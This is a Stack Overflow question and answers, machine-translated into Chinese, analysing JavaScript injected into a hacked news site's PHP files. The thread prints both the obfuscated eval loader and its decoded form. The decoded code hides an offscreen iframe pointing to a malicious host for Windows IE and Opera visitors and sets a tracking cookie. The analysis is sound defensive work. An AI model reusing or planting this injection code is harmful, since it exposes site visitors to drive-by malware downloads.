2013-01-15 94 views
0

我的朋友字新聞網站遭到攻擊,一些PHP文件注入了一些eval語句,我已經膨脹和解碼​​,但它已經導致我下面的JavaScript。JavaScript注入網站破解

任何任何想法如何去混淆這個,所以我們可以閱讀它說什麼?

ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,118,96,112,29,117,113,106,29,61,31,98,108,99,116,107,98,110,115,44,105,111,98,95,113,105,110,108,43,104,113,99,99,59,12,8,6,105,101,38,114,114,107,44,102,110,99,99,117,79,101,38,36,97,99,107,102,110,38,39,58,61,44,47,29,38,37,30,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,40,116,95,43,105,109,98,98,120,78,100,37,39,76,81,70,69,38,39,30,61,44,47,121,124,116,95,43,105,109,98,98,120,78,100,37,39,78,110,98,114,96,37,38,33,60,43,46,41,40,121,10,10,8,7,97,111,98,115,106,101,109,114,43,119,113,103,113,101,39,37,57,115,115,119,105,101,61,44,112,39,42,113,113,110,108,41,36,32,122,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,39,42,101,111,97,39,52,45,48,43,47,45,48,47,39,40,39,111,118,56,32,115,109,109,58,44,37,40,103,113,95,37,54,47,46,41,49,47,46,45,41,42,37,109,120,58,30,122,60,46,113,113,121,107,99,59,32,59,98,102,118,31,97,105,97,114,113,58,34,114,37,40,115,115,108,106,43,38,32,59,60,104,100,111,97,108,99,29,115,113,97,58,34,103,114,113,112,57,45,44,112,116,106,105,100,110,117,107,108,96,119,112,46,104,108,99,111,46,95,97,47,101,99,98,100,45,110,101,112,33,30,116,105,99,114,101,61,33,37,40,103,113,95,37,51,47,46,41,54,47,46,38,43,38,32,29,104,100,103,100,104,115,59,31,39,42,101,111,97,39,49,45,48,43,52,45,48,40,41,36,34,61,58,44,105,101,112,94,109,100,60,57,47,99,103,115,62,38,39,56,13,9,7,122,13,9,7,115,97,113,30,98,120,111,59,107,101,118,30,65,97,115,99,37,41,58,99,117,112,45,113,98,116,67,95,113,101,39,99,117,112,45,101,98,116,67,95,113,101,39,39,40,55,40,57,10,10,8,103,99,40,99,109,96,117,108,99,107,116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)} 
+0

我已經看到這是一個確切的重複,有一個很好的解釋如何解碼這些,但很難找到:( – 2013-01-15 22:30:19

+0

http://stackoverflow.com/questions/3392023/help-deobfuscate-this-js -attack?rq = 1 – 2013-01-15 22:31:12

回答

2

隱藏碼是這樣的:

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;} 
function rs(){return Math.random().toString(36).substring(5);} 
if(navigator.cookieEnabled){ 
    var stnm=rs(); 
    var ua = navigator.userAgent; 
    var url = document.location.href; 

    if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){ 
    document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>'); 
    } 
    var exp=new Date();exp.setDate(exp.getDate()+7); 
    if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';} 
} 

它存儲在F陣列以簡單的ASCII中,但每四個字符被0,1,2,和3遞增反覆以簡單的企圖混淆碼。

看起來像這樣會在每個網頁上添加一些代碼,以在i幀中顯示惡意網址。

+1

正是我已經發布的內容: - )但是,您不應該將此鏈接放在此處,因爲它可能包含惡意軟件。 – Bergi

+0

你說得對。我也會把它從這裏拉出來。遇到了解決這個難題。 – kbelder

1

我剛把這個貼到http://jsbeautifier.org/ ......祝你好運!

ww = window; 
v = "v" + "al"; 
if (ww.document) try { 
    document.body = 12; 
} catch (gdsgsdg) { 
    asd = 0; 
    try { 
     d = document 
    } catch (agdsg) { 
     asd = 1; 
    } 
    if (!asd) { 
     w = { 
      a: ww 
     }.a; 
     v = "e".concat(v); 
    } 
} 
e = w[v]; 
if (1) { 
    f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 44, 37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122); 
} 
w = f; 
s = []; 
for (i = 0; - i + 800 != 0; i += 1) { 
    j = i; 
    if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4"))); 
} 
xz = e; 
try { 
    document.body++ 
} catch (gdsgd) { 
    xz(s) 
} 
2

首先,餵它通過http://jsbeautifier.org/

現在可以很容易推斷出v成爲字符串"eval",並eeval功能。此外,您還可以運行在陣列項目建立的字符串,看看有什麼是做循環:

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;} 
function rs(){return Math.random().toString(36).substring(5);} 
if(navigator.cookieEnabled){ 
    var stnm=rs(); 
    var ua = navigator.userAgent; 
    var url = document.location.href; 
    if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){ 
     document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>'); 
    } 
    var exp=new Date();exp.setDate(exp.getDate()+7); 
    if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';} 
} 

現在這是很明顯的:它設置一個隨機標識符的cookie,並在Windows每次IE/Opera的用戶誰不瀏覽「管理員」網址,它會創建一個位於屏幕外的iframe。 iframe可能包含一些惡意軟件的逐行下載。

+0

謝謝。+1,...給了kbelder正確的答案,你們兩人的結果都是一樣的(他需要更多的堆疊點,但你;-)。 – bandejapaisa